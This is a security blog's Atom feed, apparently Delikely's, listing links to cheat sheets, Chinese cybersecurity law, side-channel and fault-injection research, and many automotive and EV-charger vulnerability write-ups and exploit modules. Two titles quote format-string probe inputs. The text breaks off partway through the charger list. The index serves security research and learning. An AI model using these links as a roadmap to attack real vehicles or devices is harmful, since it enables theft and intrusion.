-
Notifications
You must be signed in to change notification settings - Fork 5
/
atom.xml
460 lines (218 loc) · 388 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Delikely's Blog</title>
<subtitle>Tell you a story.</subtitle>
<link href="http://delikely.github.io/atom.xml" rel="self"/>
<link href="http://delikely.github.io/"/>
<updated>2024-05-26T16:57:19.496Z</updated>
<id>http://delikely.github.io/</id>
<author>
<name>Delikely</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>备忘录</title>
<link href="http://delikely.github.io/2099/01/01/cheatSheet/"/>
<id>http://delikely.github.io/2099/01/01/cheatSheet/</id>
<published>2099-01-01T14:00:00.000Z</published>
<updated>2024-05-26T16:57:19.496Z</updated>
<content type="html"><![CDATA[<h2 id="Cheat-Sheet"><a href="#Cheat-Sheet" class="headerlink" title="Cheat Sheet"></a>Cheat Sheet</h2><ul><li><a href="https://devhints.io">Devhints — cheatsheets</a></li><li><a href="https://cheatsheetseries.owasp.org">OWASP Cheat Sheet Series</a></li><li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">Reverse Shell Cheat Sheet</a></li><li><a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#restricted-characters">Cross-site scripting (XSS) cheat sheet</a></li><li><a href="https://darkdust.net/files/GDB%20Cheat%20Sheet.pdf">GDB cheatsheet</a></li><li><a href="https://hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf">IDA Pro Shortcuts</a></li><li><a href="https://courses.cs.washington.edu/courses/cse469/19wi/arm64.pdf">ARMv8 A64 Quick Reference</a></li><li><a href="https://byte.how/posts/what-are-you-telling-me-ghidra/">What’re you telling me, Ghidra?</a></li></ul><h2 id="测试指南"><a href="#测试指南" class="headerlink" title="测试指南"></a>测试指南</h2><ul><li><a href="https://mp.weixin.qq.com/s/KyVHDyfJedhW3_dXAUBETw">APP合规开发指南</a></li><li><a href="https://scriptingxss.gitbook.io/firmware-security-testing-methodology/v/zhong-wen-fstm/">OWASP固件安全性测试指南</a></li></ul><h2 id="白皮书"><a href="#白皮书" class="headerlink" title="白皮书"></a>白皮书</h2><ul><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/202007/P020200730529570390226.pdf">研发运营安全白皮书(2020年)</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201909/P020190923420831742865.pdf">中国网络安全产业白皮书(2019年)</a></li></ul><h2 id="法规"><a href="#法规" class="headerlink" title="法规"></a>法规</h2><ul><li><a href="https://lawrefbook.github.io/">中国法律快查手册</a></li><li><a href="http://www.npc.gov.cn/wxzl/gongbao/2017-02/20/content_2007531.htm">中华人民共和国网络安全法</a></li><li><a href="http://www.npc.gov.cn/npc/c30834/202108/a8c4e3672c74491a80b53a172bb753fe.shtml">中华人民共和国个人信息保护法</a></li><li><a href="http://www.gov.cn/zhengce/content/2021-08/17/content_5631671.htm">关键信息基础设施安全保护条例</a></li><li><a href="http://www.cac.gov.cn/2021-07/13/c_1627761607640342.htm">网络产品安全漏洞管理规定</a></li><li><a href="http://www.cac.gov.cn/2023-03/23/c_1681211418907384.htm">网信部门行政执法程序规定</a></li><li><a href="http://www.cac.gov.cn/2020-04/27/c_1589535450769077.htm">网络安全审查办法</a></li><li><a href="http://www.cac.gov.cn/2019-12/27/c_1578986455686625.htm">关于印发《App违法违规收集使用个人信息行为认定方法》</a></li><li><a href="https://mp.weixin.qq.com/s/ZXlFRyuxCAB1m-iDpWqDNg">《最高人民法院、最高人民检察院、公安部关于依法惩治网络暴力违法犯罪的指导意见(征求意见稿)》</a></li><li><a href="https://mp.weixin.qq.com/s/v-eReNBc0QUrhmfpdsXiCQ">国家互联网信息办公室关于《近距离自组网信息服务管理规定(征求意见稿)》</a></li><li><a href="http://www.cac.gov.cn/2023-07/03/c_1690034742530280.htm">关于调整《网络关键设备和网络安全专用产品目录》的公告</a></li></ul><h2 id="标准"><a href="#标准" class="headerlink" title="标准"></a>标准</h2><ul><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=AD7E0F02219B63653BF850759A1030C4">GB/T 42446-2023《信息安全技术 网络安全从业人员能力基本要求》</a></li></ul><h2 id="论文"><a href="#论文" class="headerlink" title="论文"></a>论文</h2><ul><li><a href="https://arxiv.org/ftp/arxiv/papers/1910/1910.01321.pdf">An Empirical Study of C++ Vulnerabilities in Crowd-Sourced Code Examples</a></li><li><a href="https://nebelwelt.net/publications/files/20SEC3.pdf">USBFuzz: A Framework for Fuzzing USB Drivers by Device Emulation</a></li><li><a href="https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-021-00091-9.pdf">ESRFuzzer: an enhanced fuzzing framework for physical SOHO router devices to discover multi-Type vulnerabilities</a></li><li><a href="https://syssec.kaist.ac.kr/pub/2019/kim_sp_2019.pdf">Touching the Untouchables: Dynamic Security Analysis of the LTE Control Plane</a></li><li><a href="https://dl.acm.org/doi/abs/10.1145/3387514.3406219">NFC+: Breaking NFC Networking Limits through Resonance Engineering</a><a href="http://xyzhang.ucsd.edu/papers/RZhao_SIGCOMM20_NFC+.pdf">PDF</a> <a href="https://renjiezhao.github.io/files/NFCplus_slides_20min.pptx">Sildes</a></li><li><a href="https://www.usenix.org/system/files/woot20-paper-klee.pdf">NFCGate: Opening the Door for NFC Security Research with a Smartphone-Based Toolkit</a></li></ul><h2 id="SOMETHING"><a href="#SOMETHING" class="headerlink" title="SOMETHING"></a>SOMETHING</h2><ul><li><a href="https://www.trickster.dev/post/decrypting-your-own-https-traffic-with-wireshark/">Decrypting your own HTTPS traffic with Wireshark</a></li></ul><h2 id="开源项目"><a href="#开源项目" class="headerlink" title="开源项目"></a>开源项目</h2><ul><li><a href="https://github.com/xairy/linux-kernel-exploitation">linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitation)</a></li></ul><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><ul><li><a href="https://mp.weixin.qq.com/s/vKqjc1uTajClu7bsn9yfLA">公安部公布打击黑客犯罪10起典型案例</a></li></ul>]]></content>
<summary type="html"><h2 id="Cheat-Sheet"><a href="#Cheat-Sheet" class="headerlink" title="Cheat Sheet"></a>Cheat Sheet</h2><ul>
<li><a href="https://devhints.io</summary>
</entry>
<entry>
<title>前沿领域</title>
<link href="http://delikely.github.io/2099/01/01/advanced/"/>
<id>http://delikely.github.io/2099/01/01/advanced/</id>
<published>2099-01-01T13:00:00.000Z</published>
<updated>2024-05-05T08:59:23.521Z</updated>
<content type="html"><![CDATA[<h2 id="侧信道"><a href="#侧信道" class="headerlink" title="侧信道"></a>侧信道</h2><ul><li><a href="https://arxiv.org/pdf/2105.12266">Wireless Charging Power Side-Channel Attacks</a></li><li><a href="https://ktln2.org/experiments-around-side-channels/">side channels: power analysis</a></li><li><a href="https://github.com/ggerganov/kbd-audio">kbd-audio: Acoustic keyboard eavesdropping (github.com)</a></li><li><a href="https://arxiv.org/abs/2301.00250">DensePose From WiFi</a></li><li><a href="https://www.hertzbleed.com">Hertzbleed Attack:Side-Channel Attack allows to remotely steal encryption keys from AMD and Intel chips</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity21/presentation/cronin">Charger-Surfing: Exploiting a Power Line Side-Channel for Smartphone Information Leakage</a></li><li><a href="https://ghosttalkattack.github.io/">GhostTalk: Interactive Attack on Smartphone Voice System Through Power Line</a> <a href="https://bbs.pediy.com/thread-271716.htm">译文</a></li><li><a href="https://www.usenix.org/system/files/sec22summer_wang-kai.pdf">GhostTouch: Targeted Attacks on Touchscreens without Physical Touch</a> <a href="https://bbs.pediy.com/thread-271675.htm">译文</a></li><li><a href="https://github.com/USSLab/DolphinAttack">DolphinAttack: Inaudible Voice Commands</a></li><li><a href="https://surfingattack.github.io/">SurfingAttack: 超声波与语音助手交互的隐秘攻击</a></li><li><a href="https://www.cs.umd.edu/~nirupam/images/2_publication/papers/LidarPhone_SenSys20_nirupam.pdf">利用激光雷达将小米扫地机器人改造为窃听器</a></li><li><a href="https://lightcommands.com/">Light Commands:利用激光向 MEMS 麦克风注入命令</a></li><li><a href="https://dl.acm.org/doi/10.1145/3485832.3485894">Obfuscation Revealed: Leveraging Electromagnetic Signals for Obfuscated Malware Classification</a></li><li><a href="https://usslab.org/projects/dewicam.html">DeWiCam: 基于流量分析的隐藏的偷拍摄像头检测</a></li><li><a href="https://mp.weixin.qq.com/s/N6CWX9ZVnbyeYBIibwb0SA">漂亮侧信道:从timeless attack到pipeline的放大攻击</a></li><li><a href="https://www.cl.cam.ac.uk/~rja14/Papers/SEv3-ch19-7sep.pdf">Security Engineering: A Guide to Building Dependable Distributed Systems,3rd Edition (Chapter 19 Side Channels)</a></li><li><a href="https://keytap3.ggerganov.com/">Keytap3: acoustic keyboard eavesdropping</a> <a href="https://github.com/ggerganov/kbd-audio">source</a></li></ul><h2 id="故障注入"><a href="#故障注入" class="headerlink" title="故障注入"></a>故障注入</h2><ul><li><a href="https://github.com/ElectronicCats/faultycat">ElectronicCats/faultycat: Faulty Cat is a low-cost Electromagnetic Fault Injection (EMFI) tool, designed specifically for self-study and hobbiest research</a></li><li><a href="https://www.synacktiv.com/publications/how-to-voltage-fault-injection">How to voltage fault injection </a></li><li><a href="https://blog.zapb.de/stm32f1-exceptional-failure/">Exception(al) Failure - Breaking the STM32F1 Read-Out Protection</a></li><li><a href="https://www.iacr.org/archive/ches2011/69170208/69170208.pdf">Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World?</a></li><li><a href="https://www.collshade.fr/articles/reneshack/rx_glitch_article.html">CVE-2021-43327 Renesas RX65 Glitching</a></li><li><a href="https://github.com/atc1441/ESP32_nRF52_SWD">ESP32_nRF52_SWD: This software brings you the possibility to Read and Write the internal Flash of the Nordic nRF52 series with an ESP32</a></li><li><a href="https://blog.csdn.net/qq_33917045/article/details/120580025">绕过APPROTECT提取nRF52840固件(CVE-2020-27211复现)</a></li><li><a href="https://paper.seebug.org/1929/">nRF52 平台芯片电压毛刺注入绕过调试保护</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a></li><li><a href="https://voidstarsec.com/blog/replicant-part-1">Replicant: Reproducing a Fault Injection Attack on the Trezor One</a></li><li><a href="https://eprint.iacr.org/2020/937.pdf">BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks?</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a></li><li><a href="https://voidstarsec.com/blog/replicant-part-1">Replicant: Reproducing a Fault Injection Attack on the Trezor One</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/09/introducing-flash-bash/">Flash BASH: A tool which automates glitching and allows for precise timing attacks</a></li><li><a href="https://limitedresults.com/2021/06/enter-the-efm32-gecko/">Enter the EFM32 Gecko</a></li><li><a href="https://limitedresults.com/2021/03/the-pocketglitcher/">The PocketGlitcher</a></li><li><a href="https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/">nRF52 Debug Resurrection (APPROTECT Bypass) Part 1</a> <a href="https://limitedresults.com/wp-content/uploads/2020/12/eu-20-Limiteresults-Debug-Resurrection-On-nRF52-Series.pdf">Silde</a></li><li><a href="https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass-part-2/">nRF52 Debug Resurrection (APPROTECT Bypass) Part 2</a></li><li><a href="https://limitedresults.com/2019/05/pwn-mbedtls-on-esp32-dfa-warm-up/">Pwn MBedTLS on ESP32: DFA Warm-up</a></li><li><a href="https://circuitcellar.com/research-design-hub/attacking-usb-gear-with-emfi/">Attacking USB Gear with EMFI</a> <a href="https://www.totalphase.com/media/pdf/whitepapers/Circuit_Cellar_TP.pdf">PDF</a></li><li><a href="https://raelize.com/blog/espressif-systems-esp32-bypassing-sb-using-emfi/">Espressif ESP32: Bypassing Secure Boot using EMFI</a></li><li><a href="https://tches.iacr.org/index.php/TCHES/article/view/8727/8327">Fill your Boots: Enhanced Embedded BootloaderExploits via Fault Injection and Binary Analysis</a></li><li><a href="https://swisskyrepo.github.io/HardwareAllTheThings/side-channel/fault-injection/">Fault Injection - Pin2pwn</a></li></ul><h2 id="AI"><a href="#AI" class="headerlink" title="AI"></a>AI</h2><ul><li><a href="https://dreamlab.net/en/blog/post/attacking-biometric-systems-with-3d-printing-1/">Attacking Biometric Systems with 3D Printing</a></li><li><a href="https://security.tencent.com/index.php/blog/msg/204">实时中文语音克隆——开源项目MockingBird体验</a></li></ul><h2 id="芯片漏洞"><a href="#芯片漏洞" class="headerlink" title="芯片漏洞"></a>芯片漏洞</h2><ul><li><a href="https://www.vusec.net/projects/slam/">SLAM: Spectre based on Linear Address Masking</a></li><li><a href="https://lock.cmpxchg8b.com/zenbleed.html">Zenbleed</a></li><li><a href="https://aepicleak.com/">ÆPIC Leak</a></li><li><a href="https://meltdownattack.com/">Meltdown and Spectre</a></li></ul>]]></content>
<summary type="html"><h2 id="侧信道"><a href="#侧信道" class="headerlink" title="侧信道"></a>侧信道</h2><ul>
<li><a href="https://arxiv.org/pdf/2105.12266">Wireless Charging</summary>
</entry>
<entry>
<title>汽车安全</title>
<link href="http://delikely.github.io/2099/01/01/automotive-security/"/>
<id>http://delikely.github.io/2099/01/01/automotive-security/</id>
<published>2099-01-01T12:00:00.000Z</published>
<updated>2024-05-27T02:14:07.641Z</updated>
<content type="html"><![CDATA[<p><a href="https://delikely.github.io/Automotive-Security-Timeline/">汽车信息安全事件时间轴</a>: <a href="https://delikely.github.io/Automotive-Security-Timeline/">timeline.icvsec.com</a></p><h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h2><ul><li><a href="https://goncalomb.com/blog/2024/01/30/f57cf19b-how-i-also-hacked-my-car">How I Also Hacked my Car</a></li><li><a href="https://icanhack.nl/blog/secoc-key-extraction/">Extracting Secure Onboard Communication (SecOC) keys from a 2021 Toyota RAV4 Prime Power</a></li><li><a href="https://autohack.in/2023/04/07/pwning-my-friends-new-car/">Pwning my Friends New Car: Digital Cockpit sKiddie Rooting</a></li><li><a href="https://xakcop.com/post/hyundai-hack-2/">Hyundai Head Unit Hacking · random hacks Standard-class Gen5 navigation</a></li><li><a href="https://mp.weixin.qq.com/s/5LNIutNmfCqPKN20ZE-4uQ">ASRG-China 社区发现三一重工等企业T-Box超危漏洞</a></li><li><a href="https://sowhat.iit.cnr.it:8443/can-work/chimaera">CHIMAERA (Custom Hyundai Motor group infotAinmEnt fiRmwAre) is a set of issues that we found on the Gen5W_L In-Vehicle Infotainment system</a></li><li><a href="https://sowhat.iit.cnr.it:8443/can-work/koffee">KOFFEE:An Android app for Kia Gen5 Head Units (HUs) that is built to exploit the vulnerability (CVE-2020-853)</a></li><li><a href="https://kentindell.github.io/2023/04/03/can-injection/">CAN Injection: keyless car theft</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/auto-draft-305/">Disclosing the Pringles Syndrome in Tesla FSD Vehicles</a></li><li><a href="https://eaton-works.com/2023/02/06/toyota-gspims-hack/">Hacking into Toyota’s global supplier management network</a></li><li><a href="https://www.saiflow.com/how-mishandling-of-websockets-can-cause-dos-and-energy-theft">How Mishandling of WebSockets Can Cause DoS and Energy Theft</a></li><li><a href="https://techcrunch.com/2022/09/21/kia-hyundai-sued-after-viral-tiktok-causes-rise-in-thefts/">Kia, Hyundai sued after viral TikTok causes rise in thefts</a></li><li><a href="https://samcurry.net/web-hackers-vs-the-auto-industry/">Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More</a></li><li><a href="https://www.navinfo.eu/insights/navinfo-europe-presents-cybersecurity-research-on-volkswagen-id-3-at-black-hat-europe/">Back-connect to the Connected Car. Search for Vulnerabilities in the VW Electric Car.</a></li><li><a href="https://twitter.com/samwcyo/status/1597695281881296897">A vulnerability affecting Hyundai and Genesis vehicles where we could remotely control car</a></li><li><a href="https://twitter.com/samwcyo/status/1597792097175674880">SiriusXM IDOR vulnerablity exposed vehicle token,that make unauthorized remotely control Honda, Nissan, Infiniti, and Acura vehicles</a></li><li><a href="https://www.blackhat.com/us-22/briefings/schedule/#rollback---a-new-time-agnostic-replay-attack-against-the-automotive-remote-keyless-entry-systems-27185">RollBack - A New Time-Agnostic Replay Attack Against the Automotive Remote Keyless Entry Systems</a></li><li><a href="https://www.mnemonic.io/resources/blog/reverse-engineering-an-ev-charger/">Reverse engineering an EV charger</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a> <a href="https://github.com/I-CAN-hack/rh850-glitch">Github</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/multiple-memory-corruption-vulnerabilities-in-covesa-dlt-daemon/">Multiple Memory Corruption Vulnerabilities in COVESA DLT daemon</a></li><li><a href="https://github.com/fmsh-seclab/TesMla">TesMla: An app to complete man in the middle attack with Tesla Model 3</a></li><li><a href="https://act-on.ioactive.com/acton/attachment/34793/f-6460b49e-1afe-41c3-8f73-17dc14916847/1/-/-/-/-/NFC-relay-TESlA_JRoriguez.pdf">NFC Relay Attack on TESLA Model Y</a> <a href="https://www.youtube.com/watch?v=CpUFosSkna8">Video</a></li><li><a href="https://programmingwithstyle.com/posts/howihackedmycar/">How I Hacked my Car </a> <a href="https://mp.weixin.qq.com/s/-xlV8nPjIy5nUT4Zt4a5rg">在谷歌搜到几段密钥,就破解了自己的汽车? </a></li><li><a href="https://rollingpwn.github.io/rolling-pwn/">Rolling PWN: RF key rolling code resync</a></li><li><a href="https://trifinite.org/stuff/project_tempa/">Demystifying Tesla’s Bluetooth Passive Entry System</a> <a href="https://trifinite.org/Downloads/20220518_tempa_presentation_csw22_public.pdf">slides</a></li><li><a href="https://medium.com/@david_colombo/how-i-got-access-to-25-teslas-around-the-world-by-accident-and-curiosity-8b9ef040a028">How I got access to 25+ Tesla’s around the world. By accident. And curiosity</a></li><li><a href="https://research.nccgroup.com/2022/05/15/technical-advisory-tesla-ble-phone-as-a-key-passive-entry-vulnerable-to-relay-attacks/">Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks</a></li><li><a href="https://www.bilibili.com/video/BV1p34y1d746">【KeenLab Tech Talk(三)】Android Auto 中一个普通的堆漏洞</a></li><li><a href="https://www.synacktiv.com/publications/car-hijacking-swapping-a-single-bit.html">Car hijacking swapping a single bit </a></li><li><a href="https://keenlab.tencent.com/zh/2021/05/12/Tencent-Security-Keen-Lab-Experimental-Security-Assessment-on-Mercedes-Benz-Cars/">腾讯科恩实验室:梅赛德斯-奔驰汽车信息安全研究综述报告</a> <a href="https://keenlab.tencent.com/en/whitepapers/Mercedes_Benz_Security_Research_Report_Final.pdf">技术白皮书</a></li><li><a href="https://kunnamon.io/tbone/">TBONE – A zero-click exploit for Tesla MCUs</a></li><li><a href="https://colinoflynn.com/2020/11/bam-bam-on-reliability-of-emfi-for-in-situ-automotive-ecu-attacks/">BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks</a></li><li><a href="https://gist.github.com/gianpyc/4dc8b0d0c29774a10a97785711e325c3">CVE-2020-8539: KIA Head Unit vulnerability</a> <a href="https://github.com/rapid7/metasploit-framework/blob/master//modules/post/android/local/koffee.rb">EXP</a></li><li><a href="https://xakcop.com/post/hyundai-hack/">Hacking Hyundai Tucson 2020 · random hacks</a></li><li><a href="https://github.com/jglim/UnsignedFlash">UnsignedFlash: Firmware signature bypass on the IC204 instrument clusters</a></li><li><a href="https://www.imec-int.com/en/press/belgian-security-researchers-ku-leuven-and-imec-demonstrate-serious-flaws-tesla-model-x">特斯拉 model X 蓝牙钥匙漏洞</a> <a href="https://www.wired.com/story/tesla-model-x-hack-bluetooth/">WIRED</a> <a href="https://iacr.org/submit/files/slides/2021/rwc/rwc2021/55/slides.pdf">slides</a></li><li><a href="https://www.anquanke.com/post/id/213885">特斯拉 NFC 中继攻击(CVE-2020-15912)</a></li><li><a href="https://www.collshade.fr/articles/reneshack/rx_glitch_article.html">CVE-2021-43327 Renesas RX65 Glitching</a></li><li><a href="https://www.contextis.com/en/blog/a-code-signing-bypass-for-the-vw-polo">CVE-2020-28656: A code signing bypass for the VW Polo</a></li><li><a href="https://safekeepsecurity.com/about/cve-2020-10558/">CVE-2020-10558: Tesla Model 3 Vulnerability – Disable Autopilot Notifications, Speedometer, Web Browser, Climate Controls, Turn Signals, Nav, etc.</a></li><li><a href="https://www.esat.kuleuven.be/cosic/news/fast-furious-and-insecure-passive-keyless-entry-and-start-in-modern-supercars/">CVE-2018-16806: 特斯拉 Model S PKES 使用脆弱的 DST40 加密算法</a> <a href="https://tches.iacr.org/index.php/TCHES/article/view/8289/7862">Sildes</a> <a href="https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/">WIRED</a> <a href="https://www.wired.com/story/hackers-steal-tesla-model-s-key-fob-encryption/">AGAIN</a></li><li><a href="https://www.pentestpartners.com/security-blog/reverse-engineering-tesla-hardware/">Reverse Engineering Tesla Hardware</a></li><li><a href="https://www.pentestpartners.com/security-blog/reverse-engineering-the-tesla-firmware-update-process/">Reverse Engineering the Tesla Firmware Update Process</a></li><li><a href="https://tches.iacr.org/index.php/TCHES/article/view/8546/8111">Texas Instruments DST80 encryption vulnerable</a> <a href="https://www.wired.com/story/hackers-can-clone-millions-of-toyota-hyundai-kia-keys/">WIRED</a></li><li><a href="https://medium.com/@reliable_lait_mouse_975/mercedes-comand-infotainment-improper-format-strings-handling-4c67063d744e">CVE-2020-16142: 奔驰蓝牙名 %x%x%x%x%x%x%x%x%x 处理异常</a></li><li><a href="https://twitter.com/__Obzy__/status/864704956116254720">CVE-2017-9212: 宝马蓝牙名 %x%x%x%x 处理异常</a></li><li><a href="https://www.zerodayinitiative.com/blog/2019/12/18/regular-exploitation-of-a-tesla-model-3-through-chromium-regexp">Regular Exploitation of a Tesla Model 3 through Chromium RegExp</a></li><li><a href="https://skygo.360.cn/2020/07/20/mercedes-benz-research-report/">360 Sky-Go团队发布《梅赛德斯-奔驰安全研究报告》</a></li><li><a href="https://keenlab.tencent.com/zh/2020/03/30/Tencent-Keen-Security-Lab-Experimental-Security-Assessment-on-Lexus-Cars/#more">腾讯科恩实验室:雷克萨斯汽车安全研究综述报告</a></li><li><a href="https://skygo.360.net/tcu-bug/">福特、宝马、英菲尼迪和日产汽车TCU存在漏洞,可被远程入侵</a> <a href="https://www.youtube.com/watch?v=5QBOmr_ZyLo">Video</a> <a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf">Slides</a></li><li><a href="https://www.rapid7.com/blog/post/2017/04/25/r7-2017-02-hyundai-blue-link-potential-info-disclosure-fixed">R7-2017-02: Hyundai Blue Link Potential Info Disclosure</a></li><li><a href="https://github.com/shipcod3/mazda_getInfo/blob/master/README.md">mazda_getInfo: A PoC that the USB port is an attack surface for a Mazda car’s infotainment system</a></li><li><a href="http://jcarlosnorte.com/security/2016/03/06/hacking-tachographs-from-the-internets.html">TBOX | Hacking industrial vehicles from the internet</a> <a href="https://www.shodan.io/search?query=port%3A23+gps+"on+console"">公网暴露设备</a> <a href="https://fccid.io/A6GC4MAX-3GNA/Users-Manual/User-manual-2655341.pdf">C4MAX-3GNA Installation Guide</a></li><li><a href="https://www.vice.com/en_us/article/zmpx4x/hacker-monitor-cars-kill-engine-gps-tracking-apps">Hacker Finds He Can Remotely Kill Car Engines After Breaking Into GPS Tracking Apps</a></li><li><a href="https://www.usenix.org/conference/woot16/workshop-program/presentation/mazloom">A Security Analysis of an In-Vehicle Infotainment and App Platform(MirrorLink)</a> <a href="https://www.usenix.org/system/files/conference/woot16/woot16-paper-mazloom.pdf">Paper</a> <a href="https://www.usenix.org/sites/default/files/conference/protected-files/woot16_slides_mazloom_0.pdf">Sildes</a></li><li><a href="http://www.mmt.hs-karlsruhe.de/downloads/IEEM/Schwachstellen/PCU_Vulnerability_Description_HsKA.PDF">CVE-2017-14937: Vulnerability in pyrotechnical control units (Airbags) of passenger cars</a> <a href="https://github.com/rapid7/metasploit-framework/blob/master//modules/post/hardware/automotive/pdt.rb">EXP</a></li><li><a href="https://www.troyhunt.com/controlling-vehicle-features-of-nissan/">Controlling vehicle features of Nissan LEAFs across the globe via vulnerable APIs</a></li><li><a href="https://github.com/samyk/opensesame">OpenSesame attacks wireless garages and can open most fixed-code garages and gates in seconds using a Mattel toy</a></li><li><a href="https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/">Gone in six seconds? Exploiting car alarms</a></li><li><a href="https://www.pentestpartners.com/security-blog/obdeleven-vulnerability/">OBDeleven vulnerability</a></li><li><a href="https://argus-sec.com/remote-attack-bosch-drivelog-connector-dongle/">A Remote Attack on the Bosch Drivelog Connector Dongle</a> <a href="https://www.anquanke.com/post/id/85916">译文</a></li><li><a href="https://decoded.avast.io/martinhron/the-secret-life-of-gps-trackers-2-2/">The secret life of GPS trackers (2/2)</a></li><li><a href="https://decoded.avast.io/martinhron/the-secret-life-of-gps-trackers">The secret life of GPS trackers (1/2)</a></li><li><a href="http://wooyun.moshou.org.cn/bugs/bug_detail.php?wybug_id=wooyun-2015-0143278">wooyun-2015-0143278: 无线安全之绕过比亚迪某款汽车滚动码继续破车锁</a></li><li><a href="https://www.youtube.com/watch?v=575TcQJJWok">HackRF vs. Tesla Model S</a></li><li><a href="https://www.jkry.org/ouluhack/Toyota Touch & Go">Happy Hacking Toyota Touch&Go</a> <a href="http://www.happyhacking.org/HappyHacking/hacking/2012/03/05/Hacking-Toyota-Touh-and-go.html">More</a></li></ul><h2 id="充电桩漏洞"><a href="#充电桩漏洞" class="headerlink" title="充电桩漏洞"></a>充电桩漏洞</h2><ul><li><a href="https://bbs.pediy.com/thread-272546.htm">充电桩漏洞挖掘实践</a></li><li><a href="https://www.mdpi.com/1996-1073/15/11/3931">Review of Electric Vehicle Charger Cybersecurity Vulnerabilities, Potential Impacts, and Defenses</a></li><li><a href="https://www.pentestpartners.com/security-blog/smart-car-chargers-plug-n-play-for-hackers/">Smart car chargers. Plug-n-play for hackers</a></li><li><a href="https://forum.butian.net/share/357">施耐德充电桩漏洞挖掘之旅</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/authentication-bypass-remote-code-execution-in-schneider-electric-evlink-charging-stations/">Authentication bypass & Remote code execution in Schneider Electric EVlink Charging Stations</a> <a href="https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06">Notification</a></li><li><a href="https://conference.hitb.org/hitbsecconf2021ams/sessions/x-in-the-middle-attacking-fast-charging-electric-vehicles/">X-in-the-Middle : Attacking Fast Charging Electric Vehicles</a></li><li><a href="https://www.pentestpartners.com/security-blog/pwning-a-smart-car-charger-building-a-botnet/">Pwning a Smart Car Charger, Building a Botnet</a></li><li><a href="https://github.com/FlUxIuS/V2GInjector">V2GInjector - Tool to intrude a V2G PowerLine network, but also to capture and inject V2G packets</a></li><li><a href="https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life">cir-pwn-life:proof of concept for exploiting multiple vulnerabilities affecting Circontrol products in an automated way</a></li><li><a href="https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2018-354-01-EVLink.pdf">Security Notification – EVLink Parking</a></li><li><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/13084354/ChargePoint-Home-security-research_final.pdf">ChargePoint Home security research</a></li><li><a href="https://www.sohu.com/a/259418261_391288">e 充电 “捏枪法”、“卡秒法” 